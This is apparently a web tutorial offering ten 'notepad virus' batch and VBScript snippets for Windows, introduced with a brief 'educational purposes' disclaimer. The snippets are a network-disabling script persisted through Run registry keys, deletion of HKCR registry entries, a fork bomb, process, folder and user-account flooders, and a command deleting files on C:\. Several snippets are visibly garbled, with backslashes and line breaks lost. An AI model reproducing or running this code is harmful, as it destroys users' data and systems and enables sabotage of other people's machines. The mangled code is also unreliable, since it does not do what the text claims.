How To Create Dangerous Notepad Virus 2021 in Windows [WORKING]

Have you heard about a computer virus? Many of us in the initial years of using a personal system have encountered one or two computer viruses and hacks from various sources. But did you ever feel to create a dangerous notepad virus of your own? In this article, we are going to learn how to create a dangerous notepad virus in 2021.

A virus is a malicious program that is injected into our computer using third-party applications. The main purpose of any virus is to slow down the performance of your system or to steal important information. Through this article, you will understand how a virus is programmed and how usually people execute them. This will help you stay on a safer side in the future.

We really recommend you all to use this Notepad Virus carefully and not for wrong purposes. Our tutorial is for educational purposes and we do not promote any kind of unethical hacking or virus. Let us begin and learn How to Create Dangerous Notepad Virus easily.

You may also like to read about ‘How to Make a Virtual USB Drive in Windows‘.

Create Dangerous Notepad Virus Executable file (.exe) using Batch scripting

Before we get into the article, let us understand what batch scripting is? In simple words, batch scripting is writing series of command lines in a text file, after we create the executable file, the script runs each line of code and finally executes the program.

Using these batch files, one can make an extremely dangerous virus. As in this tutorial we are going to learn more about the ‘Notepad virus’. Using the below script, one can delete/corrupt Windows, format drives, steal various credentials and data, and finally mess up the performance of the system.

Please use the below scripts only for educational purpose.

You may also like to read about ‘How to Fix the White Bar at the Top in File Explorer in Windows 10‘.

Writing a dangerous virus in Notepad or Text Editor

Create Dangerous Notepad Virus Executable file

For creating a notepad virus, you require a Windows system. You have to follow the below steps to Create Dangerous Notepad Virus.

Firstly, type the below codes into a notepad file, now save the file with a name along with the .bat extension. Make sure ‘Save as type‘ is ‘All files‘. Example: internetspeed.bat

P.S: Do not use your regular system that contains important files to execute the below programs (in case of testing).

You may also like to read about ‘7 Best Video Players for Windows 10 – Latest 2021 List – Download Link‘.

1. Disabling Internet Permanently

The below code will disable internet connectivity permanently from Windows.

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

2. Deleting Key Registry Files

This virus runs in loop and may cause a lot serious damage. This Notepad Virus will delete key registry files.

@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 :MESSAGE
 ECHO Your PC has been crashed.Your Dad.
 GOTO MESSAGE

3. Endless Notepads

This notepad virus program will open infinite Notepad files until the system freezes or crashes.

@ECHO off
 :top
 START %SystemRoot%\system32\notepad.exe
 GOTO top

4. Popping or Opening CD Drives

This notepad virus program will open the CD drive automatically.

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 100
 loop

5. Endless Enter Key

This notepad virus program will make the enter key press continously.

Set wshShell = wscript.CreateObject(”WScript.Shell”)
 do
 wscript.sleep 100
 wshshell.sendkeys “~(enter)”
 loop

6. Application Bomber (your choice)

This notepad virus program will open the applications continuously.

@echo off
 :x
 start winword
 start mspaint
 start notepad
 start write
 start cmd
 start explorer
 start control
 start calc
 goto x

P.S: You can change the names of applications as per your choice.

7. Infinite Folder creation (Folder Flooder)

This notepad virus program will open unlimited number of folders until system crashes.

@echo off
:x
md %random%
/folder.
goto x

8. User Account creation Flooder

This notepad virus program will create infinite amount of users in a PC.

@echo off
:xnet
user %random% /add
goto x

9. Process Loop Creator

This notepad virus program will create infinite background process to slow down system.

%0|%0

10. Hacking Windows

This notepad virus program will delete the whole C:\ drive and make it unrecoverable.

@Echo off
Del C:\ *.* |y

We have finally learnt 10 different notepad virus programs that can be extremely dangerous to Windows.

Even though many anti-virus detect this type of virus, with advancement in technology every day a new way is found to hack. So, please use all this information for safety and educational purpose only.

You may also like to read about ‘How to disable the Proximity Sensor on Android phone devices‘.

Conclusion

Thank you for reading this article on ‘How To Create Dangerous Notepad Virus 2021 [WORKING]‘. If you have any queries, please comment below. We would love to help you.

You may also like to read about ‘How to Fix the Start PXE over IPv4‘.

Leave a Comment

x